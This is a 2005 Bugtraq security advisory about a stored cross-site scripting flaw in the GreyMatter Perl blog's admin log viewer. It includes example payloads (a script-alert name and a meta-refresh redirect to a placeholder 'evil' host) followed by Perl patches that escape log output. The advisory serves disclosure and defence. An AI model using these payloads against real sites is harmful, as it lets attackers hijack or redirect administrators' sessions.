List:       bugtraq
Subject:    XSS in GreyMatter blog
From:       poizon () securityinfo ! ru
Date:       2005-08-31 8:58:35
Message-ID: 60050.213.140.231.61.1125478715.squirrel () 213 ! 140 ! 231 ! 61

Greymatter is a Perl-based web blog.
Offsite: http://www.greymatterforums.com/
GM analyzes posted comments, and if a post contains dangerous code (such as
<script></script>), the administrator gets a message about it in the log
files. The log entry contains not only the message, but the dangerous code
itself.
When the admin views the log files (Admin panel Options: "View Control Panel
Log"), that code executes in the admin's browser.
Example attack:
Add comments:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>

The admin then cannot enter the "View Control Panel Log" menu at all, because
the page redirects to the attacker's site.
Solution:
Edit gm-library.cgi like this:
-----------------------------------------------------------
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);

foreach $gmlogfileline (@gmlogfile) {
        chomp ($gmlogfileline);
        # Protect the markup the log itself uses before stripping tags
        $gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
        $gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
        $gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
        $gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
        # Replace every remaining angle bracket (literal or entity-encoded) with #
        $gmlogfileline=~s/<|>|&lt;|&gt;/#/ig;
        # Restore the protected markup
        $gmlogfileline=~s/#BOLD_OPEN#/<b>/g;
        $gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/g;
        $gmlogfileline=~s/#FONT_OPEN#/<font size="1">/g;
        $gmlogfileline=~s/#FONT_CLOSED#/<\/font>/g;
        print "$gmlogfileline<BR>";
}
print qq(<font size="1">All dangerous tags replaced with the # symbol</font><BR>);
-------------------------------------------------------
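The patch above neutralizes angle brackets only. As an added example (not the
original patch and not Greymatter's code), the script below shows the more
general defense for a log viewer: HTML-escape every log line in full, then
restore only the exact layout tags the log itself writes (<b> and
<font size="1">, as in the patch). The sample log lines are constructed here;
the real gm-cplog.cgi format is assumed to look similar.

```perl
#!/usr/bin/perl
# Added example, not Greymatter code: render control-panel log lines so that
# user-supplied markup recorded in the log is shown as text, never executed.
use strict;
use warnings;

# Constructed sample of what gm-cplog.cgi might contain (format assumed).
# The second entry embeds the comment payload from the advisory.
my @gmlogfile = (
    '<b>2005-08-31 08:58</b> <font size="1">Comment posted on entry 12</font>',
    '<b>2005-08-31 09:01</b> <font size="1">Blocked dangerous code in comment by '
      . '<script>alert(\'XSS\')</script>: <meta http-equiv="refresh" '
      . 'content="0; url=http://site_with_danger_content.evil"/></font>',
);

# Escape the five HTML metacharacters so the browser displays the line literally.
# '&' is escaped first so already-encoded entities in the log stay inert too.
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Render one log line: escape everything, then re-enable only the exact,
# attribute-free layout tags the log writer emits. A commenter who types
# <b> gets harmless bold text; any other tag or attribute remains escaped.
sub render_log_line {
    my ($line) = @_;
    chomp $line;
    my $out = html_escape($line);
    $out =~ s/&lt;b&gt;/<b>/g;
    $out =~ s/&lt;\/b&gt;/<\/b>/g;
    $out =~ s/&lt;font size=&quot;1&quot;&gt;/<font size="1">/g;
    $out =~ s/&lt;\/font&gt;/<\/font>/g;
    return "$out<BR>\n";
}

print "Content-type: text/html\n\n";
print render_log_line($_) for @gmlogfile;
```

With this, the refresh payload from the advisory reaches the admin's browser
as the visible string &lt;meta http-equiv=&quot;refresh&quot; ...&gt; rather
than as a tag, so the log stays readable and the redirect never fires.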
Sorry for my English, it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru

